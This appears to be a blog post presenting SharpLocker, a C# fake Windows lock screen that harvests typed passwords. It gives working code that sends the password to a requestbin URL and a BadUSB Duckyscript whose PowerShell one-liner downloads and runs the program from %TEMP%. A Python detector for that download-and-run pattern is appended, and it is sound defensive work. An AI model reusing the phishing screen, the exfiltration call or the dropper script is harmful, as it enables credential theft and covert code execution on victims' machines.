This was a seriously fun project. SharpLocker, simply put, is a “fake Windows lockscreen” program written in C#. When run, up pops what appears to be a Windows lock screen prompt…

The lockscreen isn’t fully realistic: the power buttons are missing, and if the resolution of the main monitor isn’t 1080p then things end up a little stretched. The username is fetched; however, the user icon and background image are pre-determined. But it’s more than good enough to fool most.

The idea of this kind of hack is to create such an air of familiarity that an unwitting individual enters their password as a reflex to the prompt.

Any text entered is sent to the console, where a would-be attacker is free to do what they will with it. However, with a couple of extra lines of code we can exfiltrate the “password” to a remote server. In the button click method…

private void button1_Click_1(object sender, EventArgs e)
{
    HttpWebRequest req = (HttpWebRequest)WebRequest.Create("http://requestbin.net/r/xxxxxxxx?" + textBox2.Text);
    req.GetResponse();
    Taskbar.Show();
    System.Windows.Forms.Application.Exit();
}

The added highlighted code takes the TextBox’s text and packages it into the query string of a GET request, sending it off to a requestbin bin.

Requestbin.net as they put it… “gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way. Use RequestBin to see what your HTTP client is sending or to inspect and debug webhook requests.”

For example, if randomtext! is entered into the password prompt, the URL http://requestbin.net/r/[unique]?randomtext! is visited by the program, thus creating the query we see above in our requestbin bin.

It’s a bit primitive, but it works.

Furthermore, you can work this all into a Duckyscript, such that on the plugin of a BadUSB a script is run which downloads the program and executes it within a fraction of a second. If you’re not familiar with BadUSBs, see my explanation video.

DELAY 4000
GUI r
DELAY 150
STRING powershell (new-object System.Net.WebClient).DownloadFile('
REM ==== >URL BELOW< ====
STRING REPLACE_WITH_URL
REM ==== >URL ABOVE< ====
STRING ','%TEMP%\f.exe'); Start-Process "%TEMP%\f.exe"
ENTER

This Duckyscript spawns a Run prompt; a single-line PowerShell script is then keyed in which, when run, downloads the program and executes it, no frills. A would-be attacker can then back away and wait for a victim to type in their password.

How can you protect against BadUSB attacks? I have a video on that.
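
One way a defender could spot the Duckyscript's download-and-run one-liner in process-creation logs, as an added example that is not part of the original post. The event field names (parent, image, cmdline), the sample events and the example.test URLs are constructed for illustration, and the check also accepts the saps and & launch forms, which goes slightly beyond the exact line in the script.

```python
import re

# DownloadFile('<url>','<dest>') as keyed in by the Duckyscript, then a launch
# via Start-Process (or saps / &) with a quoted or bare path.
DOWNLOAD = re.compile(
    r"""DownloadFile\(\s*['"](?P<url>[^'"]+)['"]\s*,\s*['"](?P<dest>[^'"]+)['"]\s*\)""",
    re.IGNORECASE)
LAUNCH = re.compile(
    r"""(?:Start-Process|saps|&)\s+(?:['"](?P<q>[^'"]+)['"]|(?P<b>\S+))""",
    re.IGNORECASE)
TEMP_HINTS = ("%temp%", "$env:temp", "\\appdata\\local\\temp\\")

def norm(path):
    return path.strip().strip("'\";").lower()

def analyze(event):
    """Return a finding for one process-creation event, or None if it does not match."""
    if event["image"].lower().rsplit("\\", 1)[-1] not in ("powershell.exe", "pwsh.exe"):
        return None
    dl = DOWNLOAD.search(event["cmdline"])
    if not dl:
        return None
    dest = norm(dl["dest"])
    # Only flag when the file that was just downloaded is the one being launched.
    launches = LAUNCH.finditer(event["cmdline"], dl.end())
    if dest not in {norm(m["q"] or m["b"]) for m in launches}:
        return None
    reasons = ["download followed by execution of the same file"]
    if any(hint in dest for hint in TEMP_HINTS):
        reasons.append("payload written to a temp directory")
    if event["parent"].lower().endswith("\\explorer.exe"):
        reasons.append("parent is explorer.exe, as for a Run-dialog launch")
    return {"url": dl["url"], "dest": dl["dest"], "reasons": reasons}

# Constructed sample events; field names (parent, image, cmdline) are this example's own.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TMP = r"C:\Users\alice\AppData\Local\Temp\f.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell (new-object System.Net.WebClient).DownloadFile("
                f"'http://example.test/f.exe','{TMP}'); Start-Process \"{TMP}\""},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell (New-Object System.Net.WebClient).DownloadFile("
                r"'https://intranet.example.test/r.csv','C:\Reports\r.csv')"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell Start-Process notepad.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev))
```

Only the first sample event is flagged; a download that is never launched and a launch with no preceding download both pass.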